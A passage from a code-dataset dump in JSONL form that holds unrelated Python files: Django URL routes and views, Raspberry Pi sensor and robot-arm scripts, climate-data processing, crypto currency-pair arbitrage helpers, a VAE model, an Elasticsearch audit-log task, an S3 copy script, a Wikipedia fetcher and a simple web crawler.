path(\"metadata/manage/oidc/\", metadata_management, {\"service_type\": \"oidc\"}, name=\"metadata-manage-oidc\"),\n path(\"metadata//\", metadata, name=\"metadata-view\"),\n path(\"redirecturi//\", redirecturi_list, name=\"redirecturi-list\"),\n path(\n \"technical//\",\n login_required(SamlTechnicalInformationUpdate.as_view()),\n name=\"technical-update\",\n ),\n path(\n \"ldap//\",\n login_required(LdapTechnicalInformationUpdate.as_view()),\n name=\"ldap-technical-update\",\n ),\n path(\n \"oidc//\",\n login_required(OidcTechnicalInformationUpdate.as_view()),\n name=\"oidc-technical-update\",\n ),\n path(\n \"serviceprovider/add/saml/\",\n login_required(SamlServiceProviderCreate.as_view()),\n name=\"saml-serviceprovider-add\",\n ),\n path(\n \"serviceprovider/add/ldap/\",\n login_required(LdapServiceProviderCreate.as_view()),\n name=\"ldap-serviceprovider-add\",\n ),\n path(\n \"serviceprovider/add/oidc/\",\n login_required(OidcServiceProviderCreate.as_view()),\n name=\"oidc-serviceprovider-add\",\n ),\n path(\n \"serviceprovider/remove//\",\n login_required(ServiceProviderDelete.as_view()),\n name=\"serviceprovider-delete\",\n ),\n path(\n \"serviceprovider//\",\n login_required(BasicInformationUpdate.as_view()),\n name=\"basicinformation-update\",\n ),\n path(\"saml_admin_list/\", login_required(SAMLAdminList.as_view()), name=\"saml-admin-list\"),\n path(\"statistics/summary/\", statistics_summary_list, name=\"statistics-summary-list\"),\n path(\"statistics//\", statistics_list, name=\"statistics-list\"),\n path(\"summary//\", login_required(BasicInformationView.as_view()), name=\"summary-view\"),\n path(\"testuser//\", testuser_list, name=\"testuser-list\"),\n path(\"testuser/data//\", testuser_attribute_data, name=\"testuser-attribute-data\"),\n path(\"usergroup//\", usergroup_list, name=\"usergroup-list\"),\n path(\"invite/\", activate_key, name=\"invite-activate\"),\n path(\"invite//\", activate_key, name=\"invite-activate-key\"),\n path(\"error/\", sp_error, name=\"error\"),\n path(\"\", include(\"django.contrib.auth.urls\")),\n path(\"i18n/\", include(\"django.conf.urls.i18n\")),\n]\n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":6324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"104987721","text":"# -*- coding: utf-8 -*-\n# @Time : 2017/12/14 23:33\n# @Author : play4fun\n# @File : t1.py\n# @Software: PyCharm\n\n\"\"\"\nt1.py:\n\"\"\"\nfrom time import sleep\nfrom uf.wrapper.swift_api import SwiftAPI\nfrom uf.utils.log import *\n\nlogger_init(logging.VERBOSE)\n# logger_init(logging.DEBUG)\n# logger_init(logging.INFO)\n\nprint('setup swift ...')\n\n# swift = SwiftAPI(dev_port = '/dev/ttyACM0')\n# swift = SwiftAPI(filters = {'hwid': 'USB VID:PID=2341:0042'})\nswift = SwiftAPI() # default by filters: {'hwid': 'USB VID:PID=2341:0042'}\nprint('sleep 2 sec ...')\nsleep(2)\n\nprint('device info: ')\nprint(swift.get_device_info())\nsleep(2)\n# swift.reset()\nswift.set_position(x=300, wait=True)\nsleep(3)\nprint(swift.get_position())\nsleep(3)\nswift.set_position(y=0, wait=True)\nsleep(3)\n\n# swift.set_position(x=200,y=0, z=45, wait=True)\nswift.set_position(z=85, wait=True)\nsleep(2)\nfor x in range(0, 180,30):\n swift.set_wrist(angle=x, wait=True)\n sleep(0.2)\nswift.set_wrist(angle=90, wait=True)\nswift.set_buzzer()\nsleep(2)\nswift.set_position(x=300, y=0, z=110, wait=True)\n\n#\nswift.set_position(x=330, y=0, z=85, wait=True)\nsleep(2)\nfor x in range(0, 180,30):\n swift.set_wrist(angle=x, wait=True)\n sleep(0.2)\nswift.set_wrist(angle=90, wait=True)\nswift.set_buzzer()\nsleep(2)\n\nprint('finished')\ntry:\n while True:\n sleep(1)\nexcept KeyboardInterrupt as e:\n print('KeyboardInterrupt',e)\nfinally:\n swift.reset()\n","sub_path":"毛笔字/t1.py","file_name":"t1.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"363828266","text":"import RPi.GPIO as GPIO\nimport time\nimport threading\n\n\n\nFL_TRIG = 20\nFL_ECHO = 11\nFC_TRIG = 26\nFC_ECHO = 8\nFR_TRIG = 21\nFR_ECHO = 7\n\nclass sonicSensor(object):\n \n def __init__(self,trig,echo):\n self.trig = trig\n self.echo = echo\n self.last_range = 0\n GPIO.setup(self.trig, GPIO.OUT)\n GPIO.setup(self.echo, GPIO.IN)\n GPIO.output(self.trig, False)\n \n def get_range(self):\n if(self.trig < 0 or self.echo < 0):\n return -1\n GPIO.output(self.trig, True)\n time.sleep(0.000001)\n GPIO.output(self.trig,False)\n trig_end = time.time()\n\n pulse_start = time.time()\n pulse_end = 0\n \n #Wait for first instance of echo. Time out after 0.001 seconds\n while GPIO.input(self.echo) == 0 and pulse_start-trig_end < 0.001:\n pulse_start = time.time()\n pulse_end = time.time()\n \n while GPIO.input(self.echo) == 1:\n pulse_end = time.time()\n\n \n pulse_duration = pulse_end-pulse_start\n distance = pulse_duration * 17000\n \n self.last_range = distance\n return round(distance,2)\n\nclass SensorArray(object):\n \n def __init__(self):\n GPIO.setmode(GPIO.BCM)\n self.FL = sonicSensor(FL_TRIG,FL_ECHO)\n self.FC = sonicSensor(FC_TRIG,FC_ECHO)\n self.FR = sonicSensor(FR_TRIG,FR_ECHO)\n self.is_on = False\n self.thread = threading.Thread(target = self.Fire)\n \n def Fire(self):\n while self.is_on:\n time.sleep(0.1)\n self.FC.get_range()\n time.sleep(0.1)\n self.FR.get_range()\n time.sleep(0.1)\n self.FL.get_range()\n \n def start(self):\n self.is_on = True\n self.thread.start()\n \n def stop(self):\n self.is_on = False\n","sub_path":"Classes/Sensors.py","file_name":"Sensors.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"193563117","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 26 09:37:34 2015\n\n@author: z1s\n\"\"\"\n\nimport sys\nsys.path.append('/home/z1s/PythonScripts')\nimport binfile_io as fio\nimport amgrid as grid\nfrom scipy.io import netcdf as nc\nimport numpy as np\nimport calendar\nimport matplotlib.pyplot as plt\n\nCp = 1004.64\nLe = 2.500e6\ng = 9.80\nRair = 287.04\nRad = 6371.0e3\n\nbasedir = '/archive/Zhaoyi.Shen/ulm_201510/'\noutdir = '/home/z1s/research/nonlinearity/analysis/npz/1yr/'\nexper = 'imr_t42_'\npert = ['control','2xCO2','m2c40w30','2xCO2+m2c40w30']\nperto = ['ctrl','CO2','m2c40w30','CO2+m2c40w30']\nplat = '/gfdl.ncrc3-default-prod/'\ndiag = 'atmos_level'\ndiago = 'var2d'\nvar = 't_surf'\nvaro = 'tsfc'\nnpert = np.size(pert)\n#npert = 1\nfor i in range(npert):\n atmdir = basedir+exper+pert[i]+plat+'pp/'+diag+'/'\n stafile = atmdir+diag+'.static.nc'\n fs = []\n fs.append(nc.netcdf_file(stafile,'r',mmap=True))\n bk = fs[-1].variables['bk'][:].astype(np.float64)\n pk = fs[-1].variables['pk'][:].astype(np.float64)\n lat = fs[-1].variables['lat'][:].astype(np.float64)\n lon = fs[-1].variables['lon'][:].astype(np.float64)\n phalf = fs[-1].variables['phalf'][:].astype(np.float64)\n zsurf = fs[-1].variables['zsurf'][:].astype(np.float64)\n fs[-1].close()\n nlat = np.size(lat)\n nlon = np.size(lon)\n nphalf = np.size(phalf)\n #%%\n filedir = atmdir+'ts/daily/1yr/'\n yr = np.arange(1,10,1)\n nyr = np.size(yr)\n data = np.zeros([nyr,nphalf-1,nlat])\n #tmpZon = np.zeros([nmon,nlev-1,nlat])\n #phalfZon = np.zeros([nmon,nlev,nlat])\n for yri in range(nyr):\n yrC = '000'+str(yr[yri])+'0101-'+'000'+str(yr[yri])+'1231.'\n filename = filedir+diag+'.'+yrC+var+'.nc'\n fs.append(nc.netcdf_file(filename,'r',mmap=True))\n #pfull = fs[-1].variables['pfull'][:].astype(np.float64)\n tmp = fs[-1].variables[var][:].astype(np.float64) #t,p,lat,lon\n #tmp[np.where(tmp<-999)] = np.nan\n tmp = np.mean(tmp,3)\n data[yri,:,:] = np.mean(tmp,0)\n fs[-1].close()\n #%%\n #outfile = outdir+'dim.'+perto[i]+'_sigma.npz'\n #fio.save(outfile,lat=lat,lon=lon,phalf=phalf,pfull=pfull)\n outfile = outdir+diago+'.'+perto[i]+'_sigma.npz'\n fio.save(outfile,**{varo:data})\n \n","sub_path":"driver/calc_var2d_ts_1yr.py","file_name":"calc_var2d_ts_1yr.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"17255222","text":"import sys\r\nsys.path.append(\"..\")\r\nclass CurrencyPair:\r\n\r\n @classmethod\r\n def get_all_currency_pairs(cls, market, account=None, user_id=None):\r\n market=str(market).lower()\r\n if market=='digifinex':\r\n from packages import digifinex as DIGIFINEX\r\n digifinex=DIGIFINEX.DigiFinex(account)\r\n tickers=digifinex.ticker()\r\n # 在digiFinex返回的tickers数据结构里,每个项的vol字段的值指的是base的成交量,而不是reference的成交量,所以首先要变成reference成交量\r\n currency_pairs={\r\n 'usdt':[],\r\n 'btc':[],\r\n 'usdt2':[],\r\n 'eth':[],\r\n 'dft':[]\r\n }\r\n # currency_pairs_in_reference_of_btc=[]\r\n # currency_pairs_in_reference_of_usdt = []\r\n # currency_pairs_in_reference_of_usdt2 = []\r\n # currency_pairs_in_reference_of_eth = []\r\n # currency_pairs_in_reference_of_dft = []\r\n for item in dict(tickers).keys():\r\n base=str(item).split('_')[1]\r\n reference=str(item).split('_')[0]\r\n currency_pair=CurrencyPair(base,reference)\r\n vol=tickers[item]['vol']*tickers[item]['last']\r\n currency_pairs[reference].append({\r\n 'currency_pair':currency_pair,\r\n 'vol':vol,\r\n 'reference':reference\r\n })\r\n # sorted(x, key=lambda x : x['name'], reverse=True)\r\n for item in currency_pairs.keys():\r\n currency_pairs[item]=sorted(currency_pairs[item], key=lambda x : x['vol'], reverse=True)\r\n if market=='aex':\r\n from packages import aex as AEX\r\n aex=AEX.AEX(account, user_id)\r\n tickers={}\r\n tickers['cny']=aex.ticker(CurrencyPair('all','cny'),True)\r\n tickers['usdt']=aex.ticker(CurrencyPair('all','usdt'),True)\r\n # 在digiFinex返回的tickers数据结构里,每个项的vol字段的值指的是base的成交量,而不是reference的成交量,所以首先要变成reference成交量\r\n _tickers={}\r\n for key1 in tickers.keys():\r\n for key2 in tickers[key1]:\r\n if key1+'_'+key2=='usdt_tusd' or key1+'_'+key2=='usdt_pax':\r\n continue\r\n _tickers[key1+'_'+key2]=tickers[key1][key2]['ticker']\r\n tickers=_tickers\r\n currency_pairs={\r\n 'usdt':[],\r\n 'cny':[]\r\n }\r\n for item in dict(tickers).keys():\r\n base=str(item).split('_')[1]\r\n reference=str(item).split('_')[0]\r\n currency_pair=CurrencyPair(base,reference)\r\n vol=tickers[item]['vol']*tickers[item]['last']\r\n currency_pairs[reference].append({\r\n 'currency_pair':currency_pair,\r\n 'vol':vol,\r\n 'reference':reference\r\n })\r\n # sorted(x, key=lambda x : x['name'], reverse=True)\r\n for item in currency_pairs.keys():\r\n currency_pairs[item]=sorted(currency_pairs[item], key=lambda x : x['vol'], reverse=True)\r\n return currency_pairs\r\n\r\n @classmethod\r\n def get_top_n_currency_pairs_adjusted_by_vol(cls,market, account=None, top_n=5, user_id=None):\r\n currency_pairs=CurrencyPair.get_all_currency_pairs(market,account, user_id)\r\n for item in currency_pairs.keys():\r\n currency_pairs[item]=currency_pairs[item][:top_n]\r\n return currency_pairs\r\n\r\n @classmethod\r\n def find_triangle_arbitragable_currency_pairs(cls,market, account=None, top_n=5, user_id=None):\r\n currency_pairs=CurrencyPair.get_top_n_currency_pairs_adjusted_by_vol(market,account,top_n, user_id)\r\n arbitragable_keypairs=[]\r\n _currency_pairs=[]\r\n for item in currency_pairs.keys():\r\n for item2 in currency_pairs[item]:\r\n _currency_pairs.append(item2['currency_pair'])\r\n for i in range(0,len(_currency_pairs)):\r\n cp1=_currency_pairs[i]\r\n for j in range(i+1,len(_currency_pairs)):\r\n cp2=_currency_pairs[j]\r\n for k in range(j+1,len(_currency_pairs)):\r\n cp3=_currency_pairs[k]\r\n currencies=[]\r\n currencies.append(cp1.base)\r\n currencies.append(cp1.reference)\r\n currencies.append(cp2.base)\r\n currencies.append(cp2.reference)\r\n currencies.append(cp3.base)\r\n currencies.append(cp3.reference)\r\n distinctive_currencies=list(set(currencies))\r\n if currencies.count(distinctive_currencies[0])==2 and currencies.count(distinctive_currencies[1])==2 and currencies.count(distinctive_currencies[2])==2:\r\n arbitragable_keypairs.append([cp1,cp2,cp3])\r\n\r\n a=1\r\n return arbitragable_keypairs\r\n\r\n\r\n def __init__(self,base='btc', reference='usdt'):\r\n self.base=base\r\n self.reference=reference\r\n\r\n def subtract(self, other):\r\n if other==self.base:\r\n return self.reference\r\n if other==self.reference:\r\n return self.base\r\n else:\r\n return None\r\n\r\n def equals(self, other):\r\n if self.base==other.base and self.reference==other.reference:\r\n return True\r\n else:\r\n return False\r\n\r\n def contains(self, currency):\r\n if self.base==currency or self.reference==currency:\r\n return True\r\n else:\r\n return False\r\n\r\n def toString(self):\r\n return self.base+'_'+self.reference\r\n\r\n def get_currency_pair(self):\r\n return self.base+'_'+self.reference\r\n\r\n def get_referencial_currencies(self, market):\r\n market=str(market).lower()\r\n if market==\"okex\":\r\n return [\"btc\",\"usdt\",\"eth\",\"bch\"]\r\n elif market==\"chbtc\" or market==\"zb\":\r\n pass\r\n elif market==\"???\":\r\n pass\r\n else:\r\n pass\r\n\r\n def get_referencial_currency(self, string):\r\n try:\r\n reference=str(string).split(\"_\")[1]\r\n except Exception as e:\r\n reference=None\r\n return reference\r\n\r\n def get_base_currency(self, string):\r\n try:\r\n reference=str(string).split(\"_\")[0]\r\n except Exception as e:\r\n reference=None\r\n return reference\r\n\r\nclass Currency:\r\n\r\n def __init__(self, name):\r\n self.name=name","sub_path":"packages/currency_pair.py","file_name":"currency_pair.py","file_ext":"py","file_size_in_byte":6689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"258648862","text":"def expand_array(a):\n alphas = [x for x in a if x.isalpha()]\n nums = []\n\n x = 1\n\n while x < len(a):\n if a[x].isnumeric() and a[x - 1].isnumeric():\n nums[-1] += a[x]\n elif a[x].isnumeric():\n nums.append(a[x])\n\n x+=1\n\n print(\"\".join([alphas[i] * int(nums[i]) for i in range(len(alphas))]))\n\nexpand_array(\"a3b1c1d1e4f0g11\")","sub_path":"expand-array.py","file_name":"expand-array.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"583750359","text":"import logging\nfrom datetime import timedelta\n\nfrom django.conf import settings\nfrom django.utils import timezone\nfrom elasticsearch import Elasticsearch\n\nfrom shared.audit_log.models import AuditLogEntry\n\nES_STATUS_CREATED = \"created\"\nLOGGER = logging.getLogger(__name__)\n\n\ndef send_audit_log_to_elastic_search():\n if not (\n settings.ELASTICSEARCH_CLOUD_ID\n and settings.ELASTICSEARCH_API_ID\n and settings.ELASTICSEARCH_API_KEY\n ):\n LOGGER.warning(\n \"Trying to send audit log to Elasticsearch without proper configuration, process skipped\"\n )\n return\n es = Elasticsearch(\n cloud_id=settings.ELASTICSEARCH_CLOUD_ID,\n api_key=(settings.ELASTICSEARCH_API_ID, settings.ELASTICSEARCH_API_KEY),\n )\n entries = AuditLogEntry.objects.filter(is_sent=False).order_by(\"created_at\")\n\n for entry in entries:\n rs = es.index(\n index=settings.ELASTICSEARCH_APP_AUDIT_LOG_INDEX,\n id=entry.id,\n body=entry.message,\n )\n if rs.get(\"result\") == ES_STATUS_CREATED:\n entry.is_sent = True\n entry.save()\n\n\ndef clear_audit_log_entries(days_to_keep=30):\n # Only remove entries older than `X` days\n sent_entries = AuditLogEntry.objects.filter(\n is_sent=True, created_at__lte=(timezone.now() - timedelta(days=days_to_keep))\n )\n sent_entries.delete()\n","sub_path":"backend/shared/shared/audit_log/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"523853035","text":"from torch import optim, nn\n\nfrom ..models.model import Model\nfrom ..utils import tolist\nfrom ..losses import StochasticReconstructionLoss\n\n\nclass VAE(Model):\n \"\"\"\n Variational Autoencoder\n\n [Kingma+ 2013] Auto-Encoding Variational Bayes\n \"\"\"\n def __init__(self, encoder, decoder,\n other_distributions=[],\n regularizer=[],\n optimizer=optim.Adam,\n optimizer_params={}):\n\n # set distributions (for training)\n distributions = [encoder, decoder] + tolist(other_distributions)\n\n # set losses\n reconstruction =\\\n StochasticReconstructionLoss(encoder, decoder)\n loss = (reconstruction + regularizer).mean()\n\n super().__init__(loss, test_loss=loss,\n distributions=distributions,\n optimizer=optimizer, optimizer_params=optimizer_params)\n\n def train(self, train_x={}, **kwargs):\n return super().train(train_x, **kwargs)\n\n def test(self, test_x={}, **kwargs):\n return super().test(test_x, **kwargs)\n","sub_path":"pixyz/models/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"596490870","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom multiprocessing import Process, Queue, JoinableQueue, cpu_count\nimport sys\nimport os\n\nfrom ElProduction import ExclusiveElProduction, DynamicScaleFactors\nimport Util\n\n# compute all data points\nclass ExclusiveRunner:\n\t__qIn = JoinableQueue()\n\t__qOut = Queue()\n\tdef add(self,e):\n\t\t\"\"\"\n\t\tadds an element\n\t\t@param e element\n\t\t\"\"\"\n\t\tself.__qIn.put(e)\n\tdef run(self,nProcesses = cpu_count()):\n\t\t\"\"\"\n\t\tcomputes all elements\n\t\t@param nProcesses number of parallel threads\n\t\t\"\"\"\n\t\t# add EOF\n\t\tlenParams = self.__qIn.qsize()\n\t\tfor n in xrange(nProcesses):\n\t\t\tself.__qIn.put(None)\n\t\t# setup PDFs\n\t\tUtil.setupPDFs()\n\t\t# start processes\n\t\tthreadArgs = (self.__qIn, self.__qOut)\n\t\tprocesses = []\n\t\tfor j in xrange(nProcesses):\n\t\t\tprocesses.append(Process(target=_threadWorker, args=threadArgs))\n\t\t[p.start() for p in processes]\n\t\t# run\n\t\ttry:\n\t\t\tself.__qIn.join()\n\t\texcept KeyboardInterrupt:\n\t\t\t[p.terminate() for p in processes]\n\t\t\tprint\n\t\t\tUtil.pWarn(\"aborting at %d/%d\"%((lenParams-self.__qIn.qsize()),lenParams))\n\t\t\tself.__qIn.close()\n\t\tself.__qIn.close()\n\t\t# remap\n\t\tlOut = []\n\t\tfor j in xrange(lenParams):\n\t\t\tlOut.append(self.__qOut.get())\n\t\tself.__qOut.close()\n\t\treturn lOut\n\n# thread worker\ndef _threadWorker(qIn, qOut):\n\twhile True:\n\t\t# get\n\t\tp = qIn.get()\n\t\tif None == p: # EOF?\n\t\t\tqIn.task_done()\n\t\t\tbreak\n\t\t# setup\n\t\to = ExclusiveElProduction(*p[\"objArgs\"])\n\t\to.setPdf(*p[\"pdf\"])\n\t\to.setLambdaQCD(p[\"lambdaQCD\"])\n\t\tif p.has_key(\"mu2\"): o.setMu2 (DynamicScaleFactors(*p[\"mu2\"]))\n\t\tif p.has_key(\"muR2\"): o.setMuR2(DynamicScaleFactors(*p[\"muR2\"]))\n\t\tif p.has_key(\"muF2\"): o.setMuF2(DynamicScaleFactors(*p[\"muF2\"]))\n\t\tif p.has_key(\"bjorkenX\"): o.setBjorkenX(p[\"bjorkenX\"])\n\t\tif p.has_key(\"hadronicS\"): o.setHadronicS(p[\"hadronicS\"])\n\t\tif p.has_key(\"activatedHistograms\"):\n\t\t\tfor e in p[\"activatedHistograms\"]:\n\t\t\t\to.activateHistogram(*e)\n\t\tif p.has_key(\"calls\"): \t\to.MCparams.calls = p[\"calls\"]\n\t\tif p.has_key(\"iterations\"): \to.MCparams.iterations = p[\"iterations\"]\n\t\tif p.has_key(\"bins\"): \t\to.MCparams.bins = p[\"bins\"]\n\t\tif p.has_key(\"adaptChi2\"): \to.MCparams.adaptChi2 = p[\"adaptChi2\"]\n\t\tif p.has_key(\"verbosity\"): \to.MCparams.verbosity = p[\"verbosity\"]\n\t\t# run\n\t\tp[\"res\"] = o.F(p[\"orderFlag\"],p[\"channelFlag\"])\n\t\tqOut.put(p)\n\t\tqIn.task_done()\n\t\tif p.has_key(\"msg\"): Util.pSucc(p[\"msg\"])\n","sub_path":"py/ExclusiveRunner.py","file_name":"ExclusiveRunner.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"29747784","text":"#! /home/tony/anaconda3/bin/python\nimport subprocess\nimport os.path\nfrom pprint import pprint\nimport time\n\nbucketIn = 's3://ga-odc-eros-cog-west/'\nbucketOut = 's3://ga-odc-eros-archive-west/'\n\nhomeDir='/home/ubuntu'\n\nBigcnt=0\nBigtime1 = 0;\nBigtime0 = time.time()\n\n\ndef subprocess_cmd(command):\n process = subprocess.Popen(command,stdout=subprocess.PIPE, shell=True)\n proc_stdout = process.communicate()[0].strip()\n stupidBytesObject = proc_stdout\n outStr = (stupidBytesObject.decode(\"utf-8\"))\n print(outStr)\n return(outStr)\n\ndef s3CopyFile(fromfile, tofile):\n\tprint (\"hello from s3CopyFile copying file \" + fromfile)\n\tinfile = \"'\" + bucketIn + fromfile + \"'\"\n\toutfile = \"'\" + bucketOut + tofile + \"'\"\n\tpushcmd = \"aws s3 cp %s %s\" % (infile, outfile)\n\tprint (pushcmd)\n\tsubprocess_cmd(pushcmd)\n\ndef mkFileName(filename, prefix, extension):\n a = filename.split('/')\n cell = a[0]\n file = a[1]\n dir = file.split('.xml')[0]\n file = dir + ext\n subdirs = \"%s/%s/%s/\" % (cell,dir,prefix)\n print (subdirs)\n root= 'exp/'\n fullDir=root + subdirs + file\n print (fullDir)\n return(fullDir)\n\ndef tarFileName(xmlFile, extension):\n file = xmlFile.split('.xml')[0] + extension\n return(file)\n\n\n# get the file list\n\nfileExtensions = ['.tif', '.xml']\n\n\ns3CopyFile(fromfile=\"AAlist.html\", tofile=\"AAlist.html\")\nmyfile = \"./cogxml.txt\"\n#myfile = \"./singlexml.txt\"\nwith open(myfile) as f:\n for line in f:\n line = line.rstrip()\n #print (line)\n a = line.split('h03v03/')\n id = 'h03v03/' + a[1]\n print (id)\n for ext in fileExtensions:\n pre = 'TIF'\n bucketFile = mkFileName(filename=id, prefix=pre, extension=ext)\n #print(\"bucketFile is %s\" % bucketFile)\n fromfile = id.split('.xml')[0] + ext\n s3CopyFile(fromfile=fromfile, tofile=bucketFile)\n Bigcnt = Bigcnt + 1\n print (\"BIGCNT = %d\" % Bigcnt)\n\nBigtime1 = time.time()\n\nelapsed = Bigtime1 - Bigtime0\n\nprint (\"TOTAL Bucket loading time for these files took %.2f seconds\" % elapsed)\n\n","sub_path":"00proj/python/buntar/cptiff.py","file_name":"cptiff.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"493029713","text":"from rest_framework import serializers\n\nfrom babies.models import Baby\nfrom parents.serializers import ParentSerializer\n\n\nclass BabySerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Baby\n fields = (\n 'id',\n 'first_name',\n 'last_name',\n 'age',\n 'parent'\n )","sub_path":"babies/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"473545428","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .tree import Tree, DeepCrawl\nfrom .observer import TreeNotifier\n\n\ndef tree(request):\n if request.POST:\n tree_notifier = TreeNotifier()\n for i in range(1, 5):\n tree_notifier.detach('Check' + str(i))\n for i in range(1, 5):\n if request.POST.get('Check' + str(i)) == 'on':\n tree_notifier.attach('Check' + str(i))\n answer = tree_notifier.createTree()\n # for i in answer['clients']:\n # print(i)\n return render(request, 'tree.html', answer)\n return render(request, 'tree.html', {})","sub_path":"tree/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"442454787","text":"import sys\nimport requests\nimport logging\n\nimport defaults\n\nlogging.basicConfig(filename='wikiware.log',level=logging.DEBUG)\n\nlogger = logging.getLogger('wikiware-fetcher')\n\nclass WikiwareFetch(object):\n \"\"\" Fetch content from Wikipedia \"\"\"\n\n def __init__(self):\n \"\"\" Mediawiki API query \"\"\"\n\n self.user_agent = {\n 'User-agent': 'python-request-{}'.format(sys.version.split()[0]),\n }\n\n self.headers = self.user_agent\n\n def fetch_api(self, title, format=\"json\"):\n \"\"\" dump Wikipedia article \"\"\"\n\n self.url = defaults.WIKIWARE_API_URL\n self.params = {\n 'titles': title,\n 'format': format,\n 'action': 'query',\n 'prop': 'revisions',\n 'rvprop': 'content',\n 'redirects': '',\n }\n\n r = requests.get(self.url, params=self.params, headers=self.headers)\n if r.status_code != requests.codes.ok:\n logger.error('Fetch Failed: Title={0}, Status={1}'.format(title, r.status_code))\n return ''\n\n text = r.json()\n try:\n pages = text['query']['pages']\n except:\n logger.error('No pages returned: Title={0}, Status={1}'.format(title, r.status_code))\n return ''\n revision = ''\n for page in pages:\n try:\n revision = pages[page]['revisions'][0]['*']\n except:\n pass\n break\n\n if not revision:\n logger.error('No revisions found: Title={0}, Status={1}'.format(title, r.status_code))\n return revision\n\n def fetch_en(self, title, printable=True):\n \"\"\" dump Wikipedia article in HTML \"\"\"\n\n self.url = defaults.WIKIWARE_EN_URL\n self.params = {\n 'title': title,\n 'printable': 'yes' if printable else 'no',\n }\n r = requests.get(self.url, params=self.params, headers=self.headers)\n return r.text\n\n\n\n\n\n\n\n","sub_path":"wikiware/fetcher.py","file_name":"fetcher.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"631890242","text":"import sys\n\ndef get_page(url):\n try:\n import requests\n r = requests.get(url)\n return r.text\n except:\n return \"\"\n\ndef get_next_target(page):\n start_link = page.find('href=')\n if start_link == -1:\n return None, 0\n start_quote = page.find('\"', start_link)\n end_quote = page.find('\"', start_quote + 1)\n url = page[start_quote + 1:end_quote]\n return url, end_quote\n\ndef union(p, q):\n for e in q:\n if e not in p:\n p.append(e)\n\ndef get_all_links(page):\n links = []\n while True:\n url, endpos = get_next_target(page)\n if url:\n links.append(url)\n page = page[endpos:]\n else:\n break\n return links\n\ndef crawl_web(seed, max_depth):\n # seed : 一番最初の元となるページ\n # tocrawl : クロールするページ\n # crawled : クロールが終了したページ\n tocrawl = [seed]\n crawled = []\n next_depth = []\n depth = 0\n while tocrawl and depth <= max_depth:\n page = tocrawl.pop()\n if page not in crawled:\n union(next_depth, get_all_links(get_page(page)))\n crawled.append(page)\n if not tocrawl:\n tocrawl, next_depth = next_depth, []\n depth = depth + 1\n return crawled\n\nmax_depth = 1\nlinks = crawl_web(sys.stdin.read(), max_depth)\nfor x in links:\n print(x)\n","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"227920428","text":"from django.shortcuts import render, redirect as redir\nfrom django.utils.crypto import get_random_string\n\n\n\ndef index(request):\n if \"count\" not in request.session:\n request.session[\"count\"] = 0\n if \"random\" not in request.session:\n return redir(\"/random\")\n else:\n if request.method == \"GET\":\n return render(request, \"index.html\")\n if request.method == \"POST\":\n return redir(\"/random\")\n \n\ndef random(request):\n if request.method == \"GET\":\n request.session[\"random\"] = get_random_string(length=14)\n \n request.session[\"count\"] += 1\n return redir(\"/\")\n\ndef reset(request):\n if request.method ==\"GET\":\n request.session[\"count\"] = 0\n return redir(\"/\")","sub_path":"apps/rng_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"140824462","text":"gans = []\r\nfound = []\r\nex_time = []\r\navg_per_gen = []\r\n\r\ndef new_trial(f):\r\n global gans\r\n global found\r\n global ex_time\r\n f.readline()\r\n gans.append(int(f.readline()[5:]))\r\n val = f.readline()[7:][:-1]\r\n if val == \"True\":\r\n found.append(True)\r\n else:\r\n found.append(False)\r\n val = f.readline()[9:][:-2]\r\n ex_time.append(float(val))\r\n\r\nwith open(\"RESULT.txt\") as f:\r\n while f.read(1) != '':\r\n new_trial(f)\r\n while f.readline() != \"\\n\":\r\n pass\r\n\r\ngen_avg = 0\r\nfor val in gans:\r\n gen_avg += val\r\ngen_avg /= 20\r\n\r\ns_rate = 0\r\nfor val in found:\r\n if val:\r\n s_rate += 1\r\ns_rate *= 5\r\n\r\next_avg = 0\r\nfor val in ex_time:\r\n ext_avg += val\r\next_avg /= 20\r\n\r\nsum_till = int(round(gen_avg, 0))\r\nprint(sum_till)\r\n\r\nwith open(\"PRESULT.txt\", 'w') as f:\r\n f.write(\"AVERAGE NUMBER OF GENERATIONS: \" + str(gen_avg) + '\\n')\r\n f.write(\"AVERAGE EXECUTION TIME: \" + str(ext_avg) + \"s\\n\")\r\n 